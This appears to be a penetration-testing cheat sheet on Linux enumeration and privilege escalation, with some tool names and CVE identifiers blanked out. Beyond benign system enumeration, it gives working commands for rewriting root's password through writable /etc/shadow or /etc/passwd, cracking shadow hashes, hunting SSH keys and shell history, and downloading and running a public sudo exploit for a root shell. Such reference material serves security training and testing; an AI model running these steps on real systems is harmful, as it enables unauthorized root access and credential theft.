Linux
Last updated
Was this helpful?
Last updated
Was this helpful?
Run , , for enumerating privilege escalation vectors!
# List available commands
compgen -c | sort | less
compgen -a | sort | less
# Help for a specified command
man <command>
<command> --helpGeneral networking information, such as interfaces, IP addresses, and DNS:
ip addr show
ip a
ifconfig -a # deprecated
# Show interfaces
ip link showCheck recent communications via the ARP table:
ip route
ip neighList active TCP and UDP connections:
ss -tulnp
netstat -tulnp # deprecatedList recent and persistent routes:
ip route show
ip r
route -n # legacy# General system information
neofetch
hostnamectl
uname -a
# Name of the host
hostname
# Kernel version & distro info
uname -r
cat /etc/os-release
# Terminal history file
cat ~/.bash_history
cat ~/.zsh_history
history
# Environment variables
printenv
env
# Named pipes
ls -l /proc/sys/fs/pipe-max-size
lsof
# sudo version
sudo --version# Installed packages
# Debian / Ubuntu (APT-based)
dpkg -l
apt list --installed
# RedHat / CentOS / Fedora (RPM-based)
rpm -qa
dnf list installed
yum list installed
# Arch Linux / Manjaro (Pacman)
pacman -Q
# Snap packages
snap list
# Flatpak packages
flatpak list
# Homebrew (macOS or Linux)
brew list --versions# List running processes
ps aux
# Information about a specific process
ps -p <PID> -f
cat /proc/<PID>/statusps -eo pid,cmd
systemctl# Current user
whoami
# List current user's privileges
sudo -l
# List current user's information
id
getent passwd $(whoami)
# List local users
cut -d: -f1 /etc/passwd
getent passwd
# List active (logged-on) users (works only on Windows Servers)
who
# Elevated permissions
sudo -l# List current user's groups
groups
id -Gn
# List local groups
getent group
# List group members
getent group <group># List all (including) hidden files
ls -la
# Include subdirectories
ls -laR
# Search for a specific file
find / -type f -name "local.txt" 2>/dev/null
locate local.txt
# Case-insensitive search
find / -type f -iname "local.txt" 2>/dev/nullfind / -type f -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/nullCheck permissions:
ls -l /etc/shadowIf it is writable, create/modify a user:
# Generate a new password hash
openssl passwd -1 -salt xyz newpassword
# Replace root's password with the new one
echo 'root:$1$xyz$YOUR_GENERATED_HASH' | chpasswd -e
# Switch to root
su - rootIf it is readable, copy shadow and passwd locally and crack them:
# Unshadow files
unshadow passwd shadow > hashes.txt
# Crack with john
john --wordlist=rockyou.txt hashes.txt
# Crack with hashcat
hashcat -m1800 hashes rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceCheck the file's permissions:
ls -l /etc/passwdIf it is writable:
# Generate a new hash
openssl passwd -1 -salt evil password123
# Place the hash between the first and second ':' of root
sed -i 's/^root:[^:]*:/root:$1$evil$F9LZzU/LJjH7ZQZzJX.Zn1:/' /etc/passwd
# Or append root's info to the bottom, changing 'root' to a new user (e.g. 'newroot')
echo "newroot:\$1\$evil\$F9LZzU/LJjH7ZQZzJX.Zn1:0:0:root:/root:/bin/bash" >> /etc/passwd
# Switch user
sudo su
sudo newroot$ sudo find /home -name "id_rsa" -o -name "id_dsa"# Print jobs
crontab -l
cat /etc/crontab
cat /var/log/syslog | grep "CRON"# Check the kernel's version
$ uname -a
Linux web01 5.4.0-128-generic #144-Ubuntu SMP Tue Sep 20 11:00:04 UTC 2022 x86_64
# Check the target's sudo version
$ sudo --version
Sudo version 1.8.31# Download the PoC to the target
$ wget https://raw.githubusercontent.com/worawit/CVE-2021-3156/refs/heads/main/exploit_nss.py
# Assign execute permissions
$ chmod +x exploit.py
# Run the exploit
$ ./exploit_nss.py
...
# id
uid=0(root) gid=0(root) groups=0(root),998(apache),1004(anita)can be used on the target to enumerate real-time system information!
Vulnerable to ().
Vulnerable to heap-based buffer overflow ().
There is a working available: